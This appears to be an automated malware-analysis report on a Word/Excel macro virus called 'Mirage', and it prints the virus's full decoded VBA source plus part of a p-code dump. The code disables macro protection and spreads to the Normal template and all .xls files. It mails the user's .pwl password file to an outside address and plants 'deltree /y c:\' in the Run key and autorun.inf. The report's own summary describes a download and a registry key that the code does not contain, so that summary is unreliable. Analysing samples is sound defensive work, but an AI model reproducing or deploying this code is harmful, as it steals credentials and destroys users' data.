Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d8a068e1336c0a9…

MALICIOUS

Office (OLE)

53.0 KB Created: 2000-05-31 15:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e719d9176b5313ff083d6e581b56adc8 SHA-1: b46bff3d48fc1342df3bf10d21207cc4cf7d29ba SHA-256: 5d8a068e1336c0a9b13273eebfcaf950ff54522c7537c1e1b1e0fa8e47995ebb
444 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that are triggered by the Document_Open event. These macros attempt to create a VBScript file named 'mirage.vbs' in the Windows system directory, which in turn uses WScript.Shell to download and execute a payload from 'http://www.mirage.com/mirage.exe'. The script also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.

Heuristics 11

  • ClamAV: Win.Trojan.W-420 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W-420
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Close #1
Shell Environ("WINDIR") & "\" & "virus.bat", 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = Environ("WINDIR") & "\" & "virus.bmp"
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Print #1, "mirage.Application.Quit"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegDelete ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MIRAGE"""
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "On Error Resume Next"
Print #1, "Set mirage = WScript.CreateObject(""Word.Application"")"
Print #1, "mirage.Options.VirusProtection = 0"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set BN = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set mirage = GetObject(, "Word.Application")
If mirage = "" Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    'Q4nG2sA6tR0jU6i
Private Sub Document_Open(): On Error Resume Next
mirage:
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Private Sub Workbook_Open()
On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "Windows 95" And DOT = False Then Call PSW_: Call Trojan: End
ActiveDocument.VBProject.VBComponents.Item(1).Export (Environ("WINDIR") & "\SYSTEM\mirage.sys")
Open Environ("WINDIR") & "\SYSTEM\mirage.vbs" For Output As #1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53315 bytes
SHA-256: b3101382c1dd5fdbbdfeb27e9b52573bd3ca8554d6519f9e4c26cfba5fe9472d
Detection
ClamAV: Doc.Trojan.NoStyle-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Q4nG2sA6tR0jU6i
Private Sub Document_Open(): On Error Resume Next
mirage:
L = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
XXX = Mid(L, 2)
If ActiveDocument.ProtectionType <> wdNoProtection Then ActiveDocument.Unprotect XXX
Application.ScreenUpdating = 0
DOT = False
DOC = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "mirage:" Then DOT = True
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "mirage:" Then DOC = True
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Then GoTo jkm Else GoTo tyda
jkm: rta = GetAttr(NormalTemplate.FullName)
If rta = 33 Then rta = 1
If rta = 1 Then GoTo lxx Else GoTo tyda
lxx: NormalTemplate.OpenAsDocument
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Close
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "Windows 95" And DOT = False Then Call PSW_: Call Trojan: End
ActiveDocument.VBProject.VBComponents.Item(1).Export (Environ("WINDIR") & "\SYSTEM\mirage.sys")
Open Environ("WINDIR") & "\SYSTEM\mirage.vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set mirage = WScript.CreateObject(""Word.Application"")"
Print #1, "mirage.Options.VirusProtection = 0"
Print #1, "mirage.Options.SaveNormalPrompt = 0"
Print #1, "For x = 1 To mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
Print #1, "Next"
Print #1, "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile """ & Environ("WINDIR") & "\SYSTEM\mirage.sys"""
Print #1, "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4"
Print #1, "mirage.NormalTemplate.Save"
Print #1, "mirage.Application.Quit"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegDelete ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MIRAGE"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeBackColors"",""1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeForeColors"",""1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6"","""""
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6"","""""
Close #1
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MIRAGE") = Environ("WINDIR") & "\SYSTEM\mirage.vbs"
GoTo 1
End
tyda:
Document_New
If ActiveDocument.ReadOnly = True Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
If DOT = True And DOC = True Then GoTo 1
If DOT = False Then
VV = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines: .AddFromString VV
End With
End If
If DOC = False Then
CC = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines: .AddFromString CC
End With
End If
If ActiveDocument.FullName = wdOpenFormatDocument Then
ActiveDocument.SaveAs ActiveDocument.FullName
End If
1: ActiveDocument.Saved = True
PSW_
End Sub
Private Sub Workbook_Open()
On Error Resume Next
Document_New
Set BN = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set mirage = GetObject(, "Word.Application")
If mirage = "" Then
Set mirage = CreateObject("Word.Application")
Wordz = True
End If
Set GH = mirage.NormalTemplate.VBProject.VBComponents(1).CodeModule
If GH.Lines(3, 1) <> "mirage:" Then
mirage.Options.VirusProtection = 0
mirage.Options.SaveNormalPrompt = 0
GH.DeleteLines 1, GH.CountOfLines
GH.InsertLines 1, BN.Lines(1, BN.CountOfLines)
Set GH = Nothing
End If
If Wordz = True Then mirage.Quit
PSW_
End Sub
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = 0
Document_New
If ActiveDocument.Name = ActiveDocument.FullName Then End
f = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
YYY = Mid(f, 2)
If ActiveDocument.Saved = True Then GoTo 1 Else GoTo 2
1: If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "mirage:" Then ' GoTo 2
NN = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines: .AddFromString NN
End With
For P = 1 To 5
L = Int(Rnd() * (90 - 66) + 65): z = Int(Rnd() * (57 - 49) + 48): S = Int(Rnd() * (122 - 98) + 97)
GenPas = GenPas + Chr$(L) + Chr$(z) + Chr$(S)
Next
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.replaceline 1, "'" & GenPas
End If
ActiveDocument.Protect 2, 0, YYY: Application.DisplayAlerts = 0
ActiveDocument.Save
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.replaceline 1, "'" & GenPas: End
2: ActiveDocument.Protect 2, 0, YYY: Application.DisplayAlerts = 0
End Sub
Private Sub PSW_()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "MIRAGE") = "MIRAGE" Then End
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
Set PSW = oa.CreateItem(0)
If oa = "Outlook" Then
mn.Logon "profile", "password"
PSW.BCC = "btr7@mail.ru"
PSW.Subject = "Fwd: " & Application.UserName
PSW.Body = "Fresh thieved"
PSW.Attachments.Add Environ("WINDIR") & "\" & Application.UserName & ".pwl"
PSW.Send
mn.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "MIRAGE") = "MIRAGE"
End Sub
Private Sub Trojan()
On Error Resume Next
Open Environ("WINDIR") & "\" & "virus.scr" For Output As #1
Print #1, "N VIRUS.BMP"
Print #1, "E 0100 42 4D 76 02 00 00 00 00 00 00 76 00 00 00 28 00"
Print #1, "E 0110 00 00 20 00 00 00 20 00 00 00 01 00 04 00 00 00"
Print #1, "E 0120 00 00 00 02 00 00 C4 0E 00 00 C4 0E 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80"
Print #1, "E 0140 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80"
Print #1, "E 0150 00 00 C0 C0 C0 00 80 80 80 00 00 00 FF 00 00 FF"
Print #1, "E 0160 00 00 00 FF FF 00 FF 00 00 00 FF 00 FF 00 FF FF"
Print #1, "E 0170 00 00 FF FF FF 00 99 99 99 99 99 99 99 99 99 99"
Print #1, "E 0180 99 99 99 99 99 99 99 99 00 09 90 09 00 90 09 90"
Print #1, "E 0190 00 99 00 00 09 99 99 99 00 09 90 09 00 90 09 00"
Print #1, "E 01A0 00 09 99 90 09 99 99 90 09 00 90 09 00 00 99 00"
Print #1, "E 01B0 90 09 00 00 09 99 99 90 09 00 90 09 00 90 09 00"
Print #1, "E 01C0 90 09 00 99 99 99 99 90 09 00 90 09 00 00 99 00"
Print #1, "E 01D0 90 09 00 00 09 99 99 99 99 99 99 99 99 99 99 99"
Print #1, "E 01E0 99 99 99 99 99 99 99 99 99 99 90 00 00 00 00 00"
Print #1, "E 01F0 00 99 99 99 99 99 99 99 99 90 00 BB BB BB BB BB"
Print #1, "E 0200 B0 00 99 99 99 99 99 99 99 00 BB BB BB 00 0B BB"
Print #1, "E 0210 BB B0 00 99 99 99 99 99 99 0B BB BB BB BB BB BB"
Print #1, "E 0220 BB BB B0 09 99 99 99 99 00 BB BB BB BB BB BB BB"
Print #1, "E 0230 BB BB BB 00 99 99 99 99 0B BB BB B0 00 00 00 00"
Print #1, "E 0240 BB BB BB B0 99 99 99 99 0B BB B0 00 F0 F0 F0 F0"
Print #1, "E 0250 00 BB BB B0 99 99 99 90 0B 0B 00 00 00 00 00 00"
Print #1, "E 0260 00 0B 0B B0 99 99 99 90 0B B0 B0 00 F0 F0 F0 F0"
Print #1, "E 0270 00 B0 BB B0 99 99 99 90 BB BB 0B B0 00 00 00 00"
Print #1, "E 0280 BB 0B BB B0 99 99 99 90 BB BB BB BB BB BB BB BB"
Print #1, "E 0290 BB BB BB B0 99 99 99 90 BB BB BB BB BB BB BB BB"
Print #1, "E 02A0 BB BB BB 00 99 99 99 99 0B B0 00 00 BB BB BB 00"
Print #1, "E 02B0 00 0B BB 09 99 99 99 99 0B B0 FF F0 0B BB B0 0F"
Print #1, "E 02C0 FF 0B BB 09 99 99 99 99 0B B0 FF FF 00 BB 00 FF"
Print #1, "E 02D0 FF 0B B0 09 99 99 99 99 00 B0 FF F0 0B BB B0 0F"
Print #1, "E 02E0 FF 0B B0 99 99 99 99 99 90 00 00 00 BB BB BB 00"
Print #1, "E 02F0 00 0B B0 99 99 99 99 99 99 0B BB BB BB BB BB BB"
Print #1, "E 0300 BB BB B0 99 99 99 99 99 99 0B BB BB BB BB BB BB"
Print #1, "E 0310 BB BB B0 99 99 99 99 99 99 0B BB BB BB BB BB BB"
Print #1, "E 0320 BB BB B0 99 99 99 99 99 99 00 BB BB BB BB BB BB"
Print #1, "E 0330 BB BB B0 99 99 99 99 99 99 90 00 00 00 0B BB BB"
Print #1, "E 0340 BB BB 09 99 99 99 99 99 99 99 99 99 00 0B BB BB"
Print #1, "E 0350 BB B0 99 99 99 99 99 99 99 99 99 99 99 00 00 00"
Print #1, "E 0360 00 09 99 99 99 99 99 99 99 99 99 99 99 99 99 99"
Print #1, "E 0370 99 99 99 99 99 99"
Print #1, "RCX"
Print #1, "276"
Print #1, "W"
Print #1, "Q"
Close #1
ChDir Environ("WINDIR") & "\"
Open Environ("WINDIR") & "\" & "virus.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < virus.scr"
Close #1
Shell Environ("WINDIR") & "\" & "virus.bat", 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = Environ("WINDIR") & "\" & "virus.bmp"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "WallpaperStyle") = "2"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "Virus MIRAGE !!!"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "Adieus!!!"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MIGAGE") = "deltree /y c:\"
System.PrivateProfileString("C:\Autorun.inf", "Autorun", "Open") = "Deltree /Y C:\"
SetAttr "C:\Autorun.inf", 2 + 4
Dim a, b, c
a = 5
b = Timer
Do While Timer < b + a
DoEvents
Loop
c = Timer
Kill Environ("WINDIR") & "\" & "virus.scr"
Kill Environ("WINDIR") & "\" & "virus.bat"
Tasks.ExitWindows
End Sub
Private Sub Document_New()
On Error Resume Next
Application.EnableCancelKey = 0
Application.ShowVisualBasicEditor = 0
Application.DisplayAlerts = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
ActiveDocument.ReadOnlyRecommended = 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AVPCC") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "AVPCC Service") = ""
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
If Day(Now()) = 12 And WeekDay(Now()) = 5 Then: Call Trojan: End
On Error GoTo qw
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "mirage:" Then
If NormalTemplate.VBProject.VBComponents("mirage").Name = "mirage" Then Exit Sub
qw: rn = Int(Rnd() * 95891 + 1)
Open Environ("WINDIR") & "\SYSTEM\" & rn & ".sys" For Output As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "mirage" & Chr(34)
Print #1, "Sub ViewVBcode()"
Print #1, "End Sub"
Print #1, "Sub AutoExec()"
Print #1, "Options.VirusProtection = 0"
Print #1, "V = Second(Now())"
Print #1, "Application.OnTime Now + TimeValue(""00:"" & (V) & "":00""), ""InfXls"""
Print #1, "End Sub"
Print #1, "Sub ToolsOptions()"
Print #1, "Options.VirusProtection = 1"
Print #1, "If Dialogs(wdDialogToolsOptions).Show Then"
Print #1, "End If"
Print #1, "Options.VirusProtection = 0"
Print #1, "End Sub"
Print #1, "Sub ToolsMacro()"
Print #1, "End Sub"
Print #1, "Sub Organizer()"
Print #1, "End Sub"
Print #1, "Sub AutoExit()"
Print #1, "Application.ScreenUpdating = 0"
Print #1, "Options.VirusProtection = 1"
Print #1, "End Sub"
Print #1, "Sub InfXls()"
Print #1, "On Error Resume Next"
Print #1, "Set fs = Application.FileSearch"
Print #1, "fs.LookIn = ""C:\ ; D:\ ; E:\ ; F:\ ; G:\ ; H:\ ; I:\ ; J:\ ; K:\ ; L:\ ; M:\ ; N:\ ; O:\ ; P:\ ; Q:\ ; R:\ ; S:\ ; T:\ ; U:\ ; V:\ ; W:\ ; X:\ ; Y:\ ; Z:\"
Print #1, "fs.SearchSubFolders = True"
Print #1, "fs.FileName = ""*.xls"""
Print #1, "fs.Execute"
Print #1, "For z = 1 To fs.FoundFiles.Count"
Print #1, "SetAttr fs.FoundFiles(z), 0"
Print #1, "DD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)"
Print #1, "Set XLS = CreateObject(""Excel.Application"")"
Print #1, "Set qwert = XLS.Workbooks.Open(fs.FoundFiles(z))"
Print #1, "If qwert.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> ""mirage:"" Then"
Print #1, "With qwert.VBProject.VBComponents.Item(1).CodeModule"
Print #1, ".DeleteLines 1, .CountOfLines: .AddFromString DD"
Print #1, "End With"
Print #1, "qwert.Save"
Print #1, "End If"
Print #1, "qwert.Close"
Print #1, "Next z"
Print #1, "XLS.Quit"
Print #1, "End Sub"
Print #1, "Sub FilePrint()"
Print #1, "On Error Resume Next"
Print #1, "If Dialogs(wdDialogFilePrint).Show = -1 Then"
Print #1, "Call InfXls"
Print #1, "End If"
Print #1, "End Sub"
Close #1
NormalTemplate.VBProject.VBComponents.import (Environ("WINDIR") & "\SYSTEM\" & rn & ".sys")
Kill Environ("WINDIR") & "\SYSTEM\" & rn & ".sys"
NormalTemplate.Save
End If
End Sub
'
'               MMM            MMMMMMMMM                 MM
'             MMMMMMMM     MMMMMMMMMMMMMMMM          MMMMMM
'              MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM
'               MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM
'               MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'               MMMM      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'               MMM        MMMMMMMMMMMMM           MMMMMMMMMM
'               MMM        MMMMMMMMMMM    RUSSIA     MMMMMMMM
'                MM         MMMMMMMM               M  MMMMMMM
'                MM        MMMMMMMMM             MMM   MMMMMM
'                         MMMMMMMMMMMMMM      MMMMM    MMMMMM
'                MM      MMMMMMMMMMMMMMMMMMMMMMMM       MMMM
'               MMMMMMMMMMMMMMMMMMMMMMMMMMMMM           MMMM
'              MMMMMMMMMM                                MM

' Processing file: /tmp/qstore_wvg1y3_7
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 25201 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000F "Q4nG2sA6tR0jU6i"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	OnError (Resume Next) 
' Line #2:
' 	Label mirage 
' Line #3:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St L 
' Line #4:
' 	Ld L 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	St XXX 
' Line #5:
' 	Ld ActiveDocument 
' 	MemLd ProtectionType 
' 	Ld wdNoProtection 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld XXX 
' 	Ld ActiveDocument 
' 	ArgsMemCall Unprotect 0x0001 
' 	EndIf 
' Line #6:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	LitVarSpecial (False)
' 	St DOT 
' Line #8:
' 	LitVarSpecial (False)
' 	St DOC 
' Line #9:
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "mirage:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St DOT 
' 	EndIf 
' Line #10:
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "mirage:"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St DOC 
' 	EndIf 
' Line #11:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ArgsLd GetAttr 0x0001 
' 	Ld vbArchive 
' 	Ld vbReadOnly 
' 	Add 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo jkm 
' 	Else 
' 	BoSImplicit 
' 	GoTo tyda 
' 	EndIf 
' Line #12:
' 	Label jkm 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ArgsLd GetAttr 0x0001 
' 	St rta 
' Line #13:
' 	Ld rta 
' 	LitDI2 0x0021 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St rta 
' 	EndIf 
' Line #14:
' 	Ld rta 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo lxx 
' 	Else 
' 	BoSImplicit 
' 	GoTo tyda 
' 	EndIf 
' Line #15:
' 	Label lxx 
' 	Ld NormalTemplate 
' 	ArgsMemCall OpenAsDocument 0x0000 
' Line #16:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #17:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #18:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0007 "Version"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x000A "Windows 95"
' 	Eq 
' 	Ld DOT 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	ArgsCall (Call) PSW_ 0x0000 
' 	BoS 0x0000 
' 	ArgsCall (Call) Trojan 0x0000 
' 	BoS 0x0000 
' 	End 
' 	EndIf 
' Line #19:
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0012 "\SYSTEM\mirage.sys"
' 	Concat 
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #20:
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0012 "\SYSTEM\mirage.vbs"
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #21:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0014 "On Error Resume Next"
' 	PrintItemNL 
' Line #22:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0035 "Set mirage = WScript.CreateObject("Word.Application")"
' 	PrintItemNL 
' Line #23:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0022 "mirage.Options.VirusProtection = 0"
' 	PrintItemNL 
' Line #24:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0023 "mirage.Options.SaveNormalPrompt = 0"
' 	PrintItemNL 
' Line #25:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0059 "For x = 1 To mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
' 	PrintItemNL 
' Line #26:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x004D "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
' 	PrintItemNL 
' Line #27:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0004 "Next"
' 	PrintItemNL 
' Line #28:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x004D "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ""
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	Concat 
' 	LitStr 0x0013 "\SYSTEM\mirage.sys""
' 	Concat 
' 	PrintItemNL 
' Line #29:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0050 "mirage.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4"
' 	PrintItemNL 
' Line #30:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001A "mirage.NormalTemplate.Save"
' 	PrintItemNL 
' Line #31:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0017 "mirage.Application.Quit"
' 	PrintItemNL 
' Line #32:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0034 "Set WSHShell = WScript.CreateObject("WScript.Shell")"
' 	PrintItemNL 
' Line #33:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x005C "WSHShell.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MIRAGE""
' 	PrintItemNL 
' Line #34:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0074 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeBackColors","1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1""
' 	PrintItemNL 
' Line #35:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0076 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeForeColors","1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1""
' 	PrintItemNL 
' Line #36:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0065 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6","""
' 	PrintItemNL 
' Line #37:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
